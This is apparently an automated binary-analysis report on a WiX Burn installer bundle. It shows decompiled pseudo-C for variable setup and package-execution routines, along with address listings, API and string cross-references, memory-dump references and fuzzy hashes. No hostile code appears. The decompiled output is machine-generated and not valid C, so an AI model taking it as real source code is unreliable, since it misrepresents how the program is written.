				_v56 = L"WixBundleManufacturer";
				_v52 = E00402EC5;
				_v48 = 0x43b580;
				_v44 = 0;
				_v40 = L"WixBundleTag";
				_v36 = E00402EC5;
				_v32 = 0x43b580;
				_v28 = 0;
				_v24 = L"WixBundleVersion";
				_v20 = E004030C2;
				_v16 = 0;
				_v12 = 0;
				_t269 =  &_v912;
				while(1) {
					_t250 = E00402024(_t260, _v924,  *((intOrPtr*)(_t269 - 8)),  *((intOrPtr*)(_t269 - 4)),  *_t269,  *((intOrPtr*)(_t269 + 4)));
					_t256 = _t250;
					if(_t250 < 0) {
						break;
					}
					_t270 = _t270 + 1;
					_t269 = _t269 + 0x10;
					if(_t270 < 0x39) {
						continue;
					} else {
					}
					L5:
					return L004267AF(_t256, _v8 ^ _t271, _t269, _t270);
				}
				E00430A57(_t256, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t269 - 8)));
				goto L5;
			}


























































































































































































































































                                                                                                                                                                  0x00403d7a
                                                                                                                                                                  0x00403d81
                                                                                                                                                                  0x00403d84
                                                                                                                                                                  0x00403d8b
                                                                                                                                                                  0x00403d91
                                                                                                                                                                  0x00403d97
                                                                                                                                                                  0x00403da0
                                                                                                                                                                  0x00403dad
                                                                                                                                                                  0x00403dae
                                                                                                                                                                  0x00403db8
                                                                                                                                                                  0x00403dbe
                                                                                                                                                                  0x00403dc8
                                                                                                                                                                  0x00403dce
                                                                                                                                                                  0x00403dd8
                                                                                                                                                                  0x00403dde
                                                                                                                                                                  0x00403de8
                                                                                                                                                                  0x00403dee
                                                                                                                                                                  0x00403df8
                                                                                                                                                                  0x00403dfe
                                                                                                                                                                  0x00403e08
                                                                                                                                                                  0x00403e0e
                                                                                                                                                                  0x00403e18
                                                                                                                                                                  0x00403e22
                                                                                                                                                                  0x00403e28
                                                                                                                                                                  0x00403e2e
                                                                                                                                                                  0x00403e38
                                                                                                                                                                  0x00403e3e
                                                                                                                                                                  0x00403e44
                                                                                                                                                                  0x00403e4a
                                                                                                                                                                  0x00403e54
                                                                                                                                                                  0x00403e5a
                                                                                                                                                                  0x00403e60
                                                                                                                                                                  0x00403e66
                                                                                                                                                                  0x00403e70
                                                                                                                                                                  0x00403e76
                                                                                                                                                                  0x00403e80
                                                                                                                                                                  0x00403e86
                                                                                                                                                                  0x00403e90
                                                                                                                                                                  0x00403e9a
                                                                                                                                                                  0x00403ea0
                                                                                                                                                                  0x00403ea6
                                                                                                                                                                  0x00403eb0
                                                                                                                                                                  0x00403eba
                                                                                                                                                                  0x00403ec0
                                                                                                                                                                  0x00403ec6
                                                                                                                                                                  0x00403ed0
                                                                                                                                                                  0x00403ed6
                                                                                                                                                                  0x00403edc
                                                                                                                                                                  0x00403ee2
                                                                                                                                                                  0x00403eec
                                                                                                                                                                  0x00403ef2
                                                                                                                                                                  0x00403ef8
                                                                                                                                                                  0x00403efe
                                                                                                                                                                  0x00403f08
                                                                                                                                                                  0x00403f0e
                                                                                                                                                                  0x00403f18
                                                                                                                                                                  0x00403f1e
                                                                                                                                                                  0x00403f28
                                                                                                                                                                  0x00403f32
                                                                                                                                                                  0x00403f38
                                                                                                                                                                  0x00403f3e
                                                                                                                                                                  0x00403f48
                                                                                                                                                                  0x00403f52
                                                                                                                                                                  0x00403f58
                                                                                                                                                                  0x00403f5e
                                                                                                                                                                  0x00403f68
                                                                                                                                                                  0x00403f6e
                                                                                                                                                                  0x00403f78
                                                                                                                                                                  0x00403f7e
                                                                                                                                                                  0x00403f88
                                                                                                                                                                  0x00403f92
                                                                                                                                                                  0x00403f98
                                                                                                                                                                  0x00403f9e
                                                                                                                                                                  0x00403fa8
                                                                                                                                                                  0x00403fb0
                                                                                                                                                                  0x00403fb3
                                                                                                                                                                  0x00403fb6
                                                                                                                                                                  0x00403fbc
                                                                                                                                                                  0x00403fbf
                                                                                                                                                                  0x00403fc5
                                                                                                                                                                  0x00403fcb
                                                                                                                                                                  0x00403fd1
                                                                                                                                                                  0x00403fd7
                                                                                                                                                                  0x00403fdd
                                                                                                                                                                  0x00403fe3
                                                                                                                                                                  0x00403fe9
                                                                                                                                                                  0x00403fef
                                                                                                                                                                  0x00403ff2
                                                                                                                                                                  0x00403ff8
                                                                                                                                                                  0x00403ffe
                                                                                                                                                                  0x00404001
                                                                                                                                                                  0x00404007
                                                                                                                                                                  0x0040400d
                                                                                                                                                                  0x00404013
                                                                                                                                                                  0x0040401e
                                                                                                                                                                  0x0040401f
                                                                                                                                                                  0x00404025
                                                                                                                                                                  0x0040402b
                                                                                                                                                                  0x00404035
                                                                                                                                                                  0x0040403b
                                                                                                                                                                  0x00404045
                                                                                                                                                                  0x0040404f
                                                                                                                                                                  0x00404055
                                                                                                                                                                  0x0040405f
                                                                                                                                                                  0x00404065
                                                                                                                                                                  0x0040406f
                                                                                                                                                                  0x00404075
                                                                                                                                                                  0x0040407f
                                                                                                                                                                  0x00404085
                                                                                                                                                                  0x0040408b
                                                                                                                                                                  0x00404095
                                                                                                                                                                  0x0040409f
                                                                                                                                                                  0x004040a5
                                                                                                                                                                  0x004040af
                                                                                                                                                                  0x004040b5
                                                                                                                                                                  0x004040bf
                                                                                                                                                                  0x004040c9
                                                                                                                                                                  0x004040cf
                                                                                                                                                                  0x004040d9
                                                                                                                                                                  0x004040df
                                                                                                                                                                  0x004040e5
                                                                                                                                                                  0x004040ef
                                                                                                                                                                  0x004040f9
                                                                                                                                                                  0x004040ff
                                                                                                                                                                  0x00404109
                                                                                                                                                                  0x00404113
                                                                                                                                                                  0x00404119
                                                                                                                                                                  0x0040411f
                                                                                                                                                                  0x00404129
                                                                                                                                                                  0x00404133
                                                                                                                                                                  0x00404139
                                                                                                                                                                  0x00404143
                                                                                                                                                                  0x0040414d
                                                                                                                                                                  0x00404153
                                                                                                                                                                  0x0040415d
                                                                                                                                                                  0x00404163
                                                                                                                                                                  0x0040416d
                                                                                                                                                                  0x00404173
                                                                                                                                                                  0x00404179
                                                                                                                                                                  0x0040417f
                                                                                                                                                                  0x00404189
                                                                                                                                                                  0x00404193
                                                                                                                                                                  0x00404199
                                                                                                                                                                  0x0040419f
                                                                                                                                                                  0x004041a9
                                                                                                                                                                  0x004041af
                                                                                                                                                                  0x004041b5
                                                                                                                                                                  0x004041c4
                                                                                                                                                                  0x004041ca
                                                                                                                                                                  0x004041d5
                                                                                                                                                                  0x004041db
                                                                                                                                                                  0x004041e6
                                                                                                                                                                  0x004041ef
                                                                                                                                                                  0x004041f5
                                                                                                                                                                  0x004041fb
                                                                                                                                                                  0x00404201
                                                                                                                                                                  0x00404207
                                                                                                                                                                  0x00404212
                                                                                                                                                                  0x00404217
                                                                                                                                                                  0x00404221
                                                                                                                                                                  0x00404227
                                                                                                                                                                  0x00404231
                                                                                                                                                                  0x00404237
                                                                                                                                                                  0x00404241
                                                                                                                                                                  0x00404247
                                                                                                                                                                  0x0040424d
                                                                                                                                                                  0x00404257
                                                                                                                                                                  0x0040425d
                                                                                                                                                                  0x00404263
                                                                                                                                                                  0x0040426d
                                                                                                                                                                  0x00404273
                                                                                                                                                                  0x00404279
                                                                                                                                                                  0x00404283
                                                                                                                                                                  0x0040428d
                                                                                                                                                                  0x00404293
                                                                                                                                                                  0x00404299
                                                                                                                                                                  0x004042a3
                                                                                                                                                                  0x004042ad
                                                                                                                                                                  0x004042b3
                                                                                                                                                                  0x004042b9
                                                                                                                                                                  0x004042c3
                                                                                                                                                                  0x004042cd
                                                                                                                                                                  0x004042d3
                                                                                                                                                                  0x004042dd
                                                                                                                                                                  0x004042e7
                                                                                                                                                                  0x004042f1
                                                                                                                                                                  0x004042f7
                                                                                                                                                                  0x00404301
                                                                                                                                                                  0x0040430b
                                                                                                                                                                  0x00404311
                                                                                                                                                                  0x00404317
                                                                                                                                                                  0x00404321
                                                                                                                                                                  0x0040432b
                                                                                                                                                                  0x00404331
                                                                                                                                                                  0x00404337
                                                                                                                                                                  0x00404341
                                                                                                                                                                  0x00404347
                                                                                                                                                                  0x0040434d
                                                                                                                                                                  0x00404357
                                                                                                                                                                  0x0040435d
                                                                                                                                                                  0x00404363
                                                                                                                                                                  0x0040436d
                                                                                                                                                                  0x00404377
                                                                                                                                                                  0x0040437d
                                                                                                                                                                  0x00404387
                                                                                                                                                                  0x00404391
                                                                                                                                                                  0x00404397
                                                                                                                                                                  0x0040439d
                                                                                                                                                                  0x004043a7
                                                                                                                                                                  0x004043ad
                                                                                                                                                                  0x004043b3
                                                                                                                                                                  0x004043b9
                                                                                                                                                                  0x004043c3
                                                                                                                                                                  0x004043c6
                                                                                                                                                                  0x004043c9
                                                                                                                                                                  0x004043cc
                                                                                                                                                                  0x004043d3
                                                                                                                                                                  0x004043d6
                                                                                                                                                                  0x004043d9
                                                                                                                                                                  0x004043dc
                                                                                                                                                                  0x004043e3
                                                                                                                                                                  0x004043e6
                                                                                                                                                                  0x004043e9
                                                                                                                                                                  0x004043f1
                                                                                                                                                                  0x004043f8
                                                                                                                                                                  0x004043fb
                                                                                                                                                                  0x004043fe
                                                                                                                                                                  0x00404401
                                                                                                                                                                  0x00404408
                                                                                                                                                                  0x0040440b
                                                                                                                                                                  0x0040440e
                                                                                                                                                                  0x00404411
                                                                                                                                                                  0x00404418
                                                                                                                                                                  0x0040441b
                                                                                                                                                                  0x0040441e
                                                                                                                                                                  0x00404421
                                                                                                                                                                  0x00404428
                                                                                                                                                                  0x0040442b
                                                                                                                                                                  0x0040442e
                                                                                                                                                                  0x00404431
                                                                                                                                                                  0x00404438
                                                                                                                                                                  0x0040443f
                                                                                                                                                                  0x00404442
                                                                                                                                                                  0x00404445
                                                                                                                                                                  0x0040444b
                                                                                                                                                                  0x0040445c
                                                                                                                                                                  0x00404461
                                                                                                                                                                  0x00404465
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404467
                                                                                                                                                                  0x00404468
                                                                                                                                                                  0x0040446e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404470
                                                                                                                                                                  0x00404483
                                                                                                                                                                  0x00404493
                                                                                                                                                                  0x00404493
                                                                                                                                                                  0x0040447b
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401F17,00401DDF,00000000,00401E67), ref: 00403D91
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                  • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleManufacturer$WixBundleProviderKey$WixBundleTag$WixBundleVersion
                                                                                                                                                                  • API String ID: 32694325-2405281954
                                                                                                                                                                  • Opcode ID: 86e6e70fd21a92a8e0e2970293805fc2a1a59c6e9df2f6bf5e2b1866e3f01252
                                                                                                                                                                  • Instruction ID: 1c99a4027d6cd3c27a9f6e8ce8fb465294e520e7cb9d760e94a37b429f8d164c
                                                                                                                                                                  • Opcode Fuzzy Hash: 86e6e70fd21a92a8e0e2970293805fc2a1a59c6e9df2f6bf5e2b1866e3f01252
                                                                                                                                                                  • Instruction Fuzzy Hash: 911239B0D153698BDB65CF5999887CDBAB8FB49704F1091EBE10CBA251C7B50B84CF88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042051A, Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 206threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                  			E0042051A(intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr _a16, long* _a20, intOrPtr* _a24, intOrPtr _a28, char _a32, intOrPtr* _a36) {
				long _v8;
				char _v12;
				char _v16;
				HANDLE* _v20;
				void* _v24;
				signed int _t59;
				long _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;

				_t69 = _a36;
				_t73 = _a8;
				_t66 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				 *((intOrPtr*)(_a16 + 4)) = 0;
				while(1) {
					L1:
					_t59 =  *_t73 - 1;
					if(_t59 > 0xc) {
						break;
					}
					switch( *((intOrPtr*)(_t59 * 4 +  &M0042076A))) {
						case 0:
							_t71 = _a24;
							goto L4;
						case 1:
							__eax =  *(__esi + 8);
							__ecx = _a12;
							_v24 =  *(__esi + 8);
							 &_v24 = 0;
							__eflags = __ecx;
							__eax = 0 | __eflags != 0x00000000;
							_v20 = __ecx;
							__eax = (__eflags != 0) + 1;
							__eax = WaitForMultipleObjects((__eflags != 0) + 1,  &_v24, 0, 0xffffffff);
							__eflags = __eax;
							if(__eax != 0) {
								__eflags = __eax - 1;
								if(__eax == 1) {
									__eax =  &_v8;
									__eax = GetExitCodeThread(_a12,  &_v8);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = _v8;
										__ecx = 0x8000ffff;
										__eflags = __eax;
										__eax =  >=  ? 0x8000ffff : __eax;
										_push("Cache thread exited unexpectedly.");
										L35:
										_push(0x8000ffff);
										_v8 = 0x8000ffff;
									} else {
										__eax = GetLastError();
										__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
										__eflags = __eax;
										__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
										__eax = 0x80004005;
										__eflags = __ecx;
										_v8 = __ecx;
										__eax = E004300D9(0x80004005, "apply.cpp", 0x615, __ecx);
										_push("Failed to get cache thread exit code.");
										goto L30;
									}
								} else {
									__eax = GetLastError();
									__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
									__eflags = __eax;
									__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
									__eax = 0x80004005;
									__eflags = __ecx;
									_v8 = __ecx;
									__eax = E004300D9(0x80004005, "apply.cpp", 0x620, __ecx);
									_push("Failed to wait for cache check-point.");
									L30:
									_push(_v8);
								}
								goto L36;
							} else {
								__ecx = _v8;
								goto L7;
							}
							goto L37;
						case 2:
							goto L34;
						case 3:
							 &_v12 =  &_v16;
							__ecx = E00420B96(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								goto L7;
							} else {
								_push("Failed to execute EXE package.");
								goto L10;
							}
							goto L37;
						case 4:
							__eax =  &_v12;
							_t30 =  &_a32; // 0x422365
							__eax =  &_v16;
							__ecx = E00420D99(__ebx, __esi, __edi, 0,  &_v16,  *_t30,  &_v12);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								goto L7;
							} else {
								_push("Failed to execute MSI package.");
								goto L10;
							}
							goto L37;
						case 5:
							 &_v12 =  &_v16;
							__ecx = E00420EF5(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								goto L7;
							} else {
								_push("Failed to execute MSP package.");
								goto L10;
							}
							goto L37;
						case 6:
							 &_v12 =  &_v16;
							__ecx = E004210B3(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								goto L7;
							} else {
								_push("Failed to execute MSU package.");
								goto L10;
							}
							goto L37;
						case 7:
							_push(__edi);
							__ecx = E00421392(__ebx, __esi);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								goto L7;
							} else {
								_push("Failed to execute package provider registration action.");
								goto L10;
							}
							goto L37;
						case 8:
							_push(__edi);
							__ecx = E00420AEC(__ebx, __esi);
							_v8 = __ecx;
							__eflags = __ecx;
							if(__ecx >= 0) {
								L7:
								goto L23;
							} else {
								_push("Failed to execute dependency action.");
								L10:
								_push(__ecx);
								L36:
								E00430A57();
								_t66 = _v8;
							}
							goto L37;
						case 9:
							__ebx = _a20;
							__eax =  *(__esi + 8);
							 *_a20 =  *(__esi + 8);
							__ebx = _a4;
							goto L23;
						case 0xa:
							__edi = _a28;
							L4:
							 *_t71 =  *((intOrPtr*)(_t73 + 8));
							L23:
							_t64 = _v12;
							if( *_t69 < _t64) {
								 *_t69 = _t64;
							}
							if(_v16 != 0) {
								if( *_t69 < 2) {
									goto L1;
								} else {
								}
							}
							L37:
							return _t66;
					}
				}
				L34:
				_push("Invalid execute action.");
				goto L35;
			}












                                                                                                                                                                  0x00420520
                                                                                                                                                                  0x0042052a
                                                                                                                                                                  0x00420531
                                                                                                                                                                  0x00420533
                                                                                                                                                                  0x00420536
                                                                                                                                                                  0x00420539
                                                                                                                                                                  0x0042053c
                                                                                                                                                                  0x0042053f
                                                                                                                                                                  0x00420542
                                                                                                                                                                  0x00420545
                                                                                                                                                                  0x00420545
                                                                                                                                                                  0x00420547
                                                                                                                                                                  0x0042054b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420551
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420558
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420568
                                                                                                                                                                  0x0042056b
                                                                                                                                                                  0x0042056e
                                                                                                                                                                  0x00420579
                                                                                                                                                                  0x0042057b
                                                                                                                                                                  0x0042057d
                                                                                                                                                                  0x00420580
                                                                                                                                                                  0x00420583
                                                                                                                                                                  0x00420585
                                                                                                                                                                  0x0042058b
                                                                                                                                                                  0x0042058d
                                                                                                                                                                  0x004206ac
                                                                                                                                                                  0x004206af
                                                                                                                                                                  0x004206ec
                                                                                                                                                                  0x004206f3
                                                                                                                                                                  0x004206f9
                                                                                                                                                                  0x004206fb
                                                                                                                                                                  0x00420735
                                                                                                                                                                  0x00420738
                                                                                                                                                                  0x0042073d
                                                                                                                                                                  0x0042073f
                                                                                                                                                                  0x00420742
                                                                                                                                                                  0x00420753
                                                                                                                                                                  0x00420753
                                                                                                                                                                  0x00420754
                                                                                                                                                                  0x004206fd
                                                                                                                                                                  0x004206fd
                                                                                                                                                                  0x00420706
                                                                                                                                                                  0x0042070c
                                                                                                                                                                  0x0042070e
                                                                                                                                                                  0x00420711
                                                                                                                                                                  0x00420716
                                                                                                                                                                  0x00420726
                                                                                                                                                                  0x00420729
                                                                                                                                                                  0x0042072e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042072e
                                                                                                                                                                  0x004206b1
                                                                                                                                                                  0x004206b1
                                                                                                                                                                  0x004206ba
                                                                                                                                                                  0x004206c0
                                                                                                                                                                  0x004206c2
                                                                                                                                                                  0x004206c5
                                                                                                                                                                  0x004206ca
                                                                                                                                                                  0x004206da
                                                                                                                                                                  0x004206dd
                                                                                                                                                                  0x004206e2
                                                                                                                                                                  0x004206e7
                                                                                                                                                                  0x004206e7
                                                                                                                                                                  0x004206e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420593
                                                                                                                                                                  0x00420593
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420593
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205a5
                                                                                                                                                                  0x004205b3
                                                                                                                                                                  0x004205b5
                                                                                                                                                                  0x004205b8
                                                                                                                                                                  0x004205ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205bc
                                                                                                                                                                  0x004205bc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205bc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205c7
                                                                                                                                                                  0x004205cb
                                                                                                                                                                  0x004205ce
                                                                                                                                                                  0x004205dc
                                                                                                                                                                  0x004205de
                                                                                                                                                                  0x004205e1
                                                                                                                                                                  0x004205e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205e5
                                                                                                                                                                  0x004205e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004205f3
                                                                                                                                                                  0x00420601
                                                                                                                                                                  0x00420603
                                                                                                                                                                  0x00420606
                                                                                                                                                                  0x00420608
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042060a
                                                                                                                                                                  0x0042060a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042060a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420618
                                                                                                                                                                  0x00420626
                                                                                                                                                                  0x00420628
                                                                                                                                                                  0x0042062b
                                                                                                                                                                  0x0042062d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420633
                                                                                                                                                                  0x00420633
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420633
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042063a
                                                                                                                                                                  0x00420642
                                                                                                                                                                  0x00420644
                                                                                                                                                                  0x00420647
                                                                                                                                                                  0x00420649
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042064f
                                                                                                                                                                  0x0042064f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042064f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420659
                                                                                                                                                                  0x00420661
                                                                                                                                                                  0x00420663
                                                                                                                                                                  0x00420666
                                                                                                                                                                  0x00420668
                                                                                                                                                                  0x00420596
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042066e
                                                                                                                                                                  0x0042066e
                                                                                                                                                                  0x004205c1
                                                                                                                                                                  0x004205c1
                                                                                                                                                                  0x00420757
                                                                                                                                                                  0x00420757
                                                                                                                                                                  0x0042075e
                                                                                                                                                                  0x0042075e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420680
                                                                                                                                                                  0x00420683
                                                                                                                                                                  0x00420686
                                                                                                                                                                  0x00420688
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420678
                                                                                                                                                                  0x0042055b
                                                                                                                                                                  0x0042055e
                                                                                                                                                                  0x0042068b
                                                                                                                                                                  0x0042068b
                                                                                                                                                                  0x00420690
                                                                                                                                                                  0x00420692
                                                                                                                                                                  0x00420692
                                                                                                                                                                  0x00420698
                                                                                                                                                                  0x004206a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004206a7
                                                                                                                                                                  0x004206a1
                                                                                                                                                                  0x00420763
                                                                                                                                                                  0x00420767
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420551
                                                                                                                                                                  0x00420749
                                                                                                                                                                  0x0042074e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,00422365,00000000,000000FF,00000001,00000000,00000000,00422365,00000001), ref: 00420585
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004206B1
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 004206F3
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004206FD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to execute dependency action., xrefs: 0042066E
                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 004206E2
                                                                                                                                                                  • Cache thread exited unexpectedly., xrefs: 00420742
                                                                                                                                                                  • apply.cpp, xrefs: 004206D5, 00420721
                                                                                                                                                                  • Failed to execute MSI package., xrefs: 004205E5
                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 0042072E
                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 0042064F
                                                                                                                                                                  • Failed to execute EXE package., xrefs: 004205BC
                                                                                                                                                                  • Invalid execute action., xrefs: 0042074E
                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00420633
                                                                                                                                                                  • e#B, xrefs: 004205CB
                                                                                                                                                                  • Failed to execute MSP package., xrefs: 0042060A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp$e#B
                                                                                                                                                                  • API String ID: 3703294532-1935626283
                                                                                                                                                                  • Opcode ID: c24750ac9159cf6318f308b19ec8673b3f3745369c6fddf7277ef4cdf1e6390a
                                                                                                                                                                  • Instruction ID: c31b6e43ad32a2bb0ad2fe137b35aa22a7f11620dc20ada2798a4e2daf7932e0
                                                                                                                                                                  • Opcode Fuzzy Hash: c24750ac9159cf6318f308b19ec8673b3f3745369c6fddf7277ef4cdf1e6390a
                                                                                                                                                                  • Instruction Fuzzy Hash: A3617F70B01319FFEB14DF65D955AAE7BF8EB48314F60406FE806E3281D338AA419B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004016ED, Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 191windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E004016ED(void** __ecx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* __edi;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				signed int _t57;
				intOrPtr _t68;
				signed int _t85;
				void* _t87;
				intOrPtr _t89;
				signed int _t98;

				_t83 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t89 = _a8;
				_v8 = 0;
				_t81 = _t89 + 0x88;
				_v12 = 1;
				if(E0040E522(__ecx, _t89 + 0x3bc, _t89 + 0x88,  *((intOrPtr*)(_t89 + 0x20)),  *((intOrPtr*)(_t89 + 0x158))) >= 0) {
					_t47 = E00413CA0(_t89 + 0xf8, _t81);
					__eflags = _t47;
					if(_t47 >= 0) {
						__eflags =  *((intOrPtr*)(_t89 + 0x460)) - 1;
						if(__eflags != 0) {
							L11:
							_t51 = E00405A1B(_t83, __eflags, _t81, _t89 + 0xac,  *((intOrPtr*)(_t89 + 0x20)),  *((intOrPtr*)(_t89 + 0x158)), _t89 + 0xf4,  &_v12);
							__eflags = _t51;
							if(_t51 >= 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags =  *(_t89 + 0xb8);
									if( *(_t89 + 0xb8) != 0) {
										__eflags =  *((intOrPtr*)(_t89 + 0x20)) - 2;
										if( *((intOrPtr*)(_t89 + 0x20)) > 2) {
											E00417453(_a4, 0, _t89 + 0x34);
										}
									}
									_t52 = E0041787A(_a4, _t89);
									__eflags = _t52;
									if(_t52 >= 0) {
										__eflags = E00411B03(0, _t89);
										if(__eflags >= 0) {
											_t54 = E0040DE4D(_t87, __eflags,  *((intOrPtr*)(_t89 + 0x1c)), _t81);
											__eflags = _t54;
											if(_t54 >= 0) {
												_t98 = E0040B4CD(0, _t89 + 0xf8, _t81);
												__eflags = _t98;
												if(_t98 >= 0) {
													_t57 =  *(_t89 + 0x40);
													_t85 = 0;
													__eflags = _t57;
													if(_t57 == 0) {
														L31:
														_a4 = _t85;
														_t98 = E00401364(_t89,  &_a4);
														__eflags = _t98;
														if(_t98 < 0) {
															_push("Failed while running ");
															goto L35;
														}
														__eflags = _a4;
														if(_a4 == 0) {
															goto L37;
														}
														L30:
														_t85 = 0;
														__eflags = 0;
														goto L31;
													}
													__eflags =  *_t57;
													if( *_t57 == 0) {
														goto L31;
													}
													_t98 = E0040461F(_t81, L"WixBundleLayoutDirectory", _t57, 0);
													__eflags = _t98;
													if(_t98 >= 0) {
														goto L30;
													}
													_push("Failed to set layout directory variable to value provided from command-line.");
													goto L35;
												}
												_push("Failed to set registration variables.");
												goto L35;
											}
											_push("Failed to set action variables.");
											goto L35;
										}
										_push("Failed to query registration.");
									} else {
										_push("Failed to create the message window.");
									}
